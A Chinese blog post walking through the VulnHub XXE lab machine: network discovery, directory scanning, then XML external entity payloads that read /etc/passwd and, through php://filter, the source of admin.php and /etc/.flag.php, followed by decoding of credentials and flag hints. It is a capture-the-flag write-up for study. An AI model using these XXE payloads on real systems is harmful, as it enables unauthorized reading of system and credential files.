
vulnhub-XXE靶机渗透
发布日期:2021-05-09 05:19:30
浏览次数:15
分类:博客文章
本文共 1447 字,大约阅读时间需要 4 分钟。
靶机:
下载链接:
XXE注入工具下载:
CTFCrackTools解码工具:
0x01 确定目标IP
目标网络模式默认为net模式,无需修改
使用arp-scan或者netdiscover确定目标ip
arp-scan -l 或者 netdiscover -i eth1 目标ip为 192.168.88.128
探测端口,发现目标机器只开启了80端口
访问web服务发现为apache默认页面,猜测存在隐藏目录
0x02 目录爆破
dirb http://192.168.88.128 只扫到一个robots.txt文件
访问 一个/xxe/目录,有个后台页面
先访问xxe目录
输入用户名密码进行抓包分析
可以看到用户名密码是通过xml传递给后端的
0x02 xxe漏洞利用
burp抓包,修改post体,尝试读取/etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>1</password></root>
接下来我们可以使用读取admin.php的源码。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>admin</name><password>admin</password></root>
返回包进行了加密,无法直接找到flag
base64解码:找到用户名密码 administhebest/e6e061838856bf47e1de730719fb2609
对password密文进一步解码,获得用户名密码:administhebest/admin@123
使用账户名密码登录admin.php
点击登录出现的一个红色的flag字样
当点击flag会跳转 一个空白页
查看页面源码获得flag提示
<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->
先进行base32 解码,再进行base64解码
查看/etc/.flag.php源码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>
base64解码:看不懂是啥东西,将返回内容复制保存为php
开启web服务 php -S 0.0.0.0:8090 -t /root
返回的还是刚才那串字符
看到大家都是使用xampp去运行php文件,通过报错信息获得的flag,我这边报错信息中未发现flag!
发表评论
最新留言
路过按个爪印,很不错,赞一个!
[***.219.124.196]2025年04月26日 10时16分11秒
关于作者

喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
DCS控制系统概述
2023-01-24
DDNS动态域名无固定IPSEC配置实战
2023-01-24
DELL笔记本UEFI+GPT安装window10与Ubuntu双系统
2023-01-24
Docker+Jenkins+GIT CICD持续化集成实战
2023-01-24
Dockerfile 指令详解
2023-01-24
Docker安装MongoDB(附Docker虚拟机环境与MongoDB客户端连接工具)
2023-01-24
DRBD分布式存储解决方案实战
2023-01-24
DRBL+Clonezilla全自动批量安装操作系统
2023-01-24
DSMM数据安全概述
2023-01-24
Dva员工增删改查Demo实现-优化
2023-01-24
EasyUi的使用与代码编写(一)
2023-01-24
eclipse配置tomcat8.5报错The Apache Tomcat installation at this directory is version 8.5.4. A Tomcat
2023-01-24
eclipse配置xml的自动提示
2023-01-24
"不能为虚拟电脑 ubuntu 打开一个新任务"的解决办法
2023-01-24
eclipse重置页面恢复到最初布局状态
2023-01-24
ecmall开发记录(一)
2023-01-24
ECSHOP实现收货国家省市由选择下拉菜单改为手动
2023-01-24
ECShop模板原理
2023-01-24
edgeboxes proposal 和dpm 连接
2023-01-24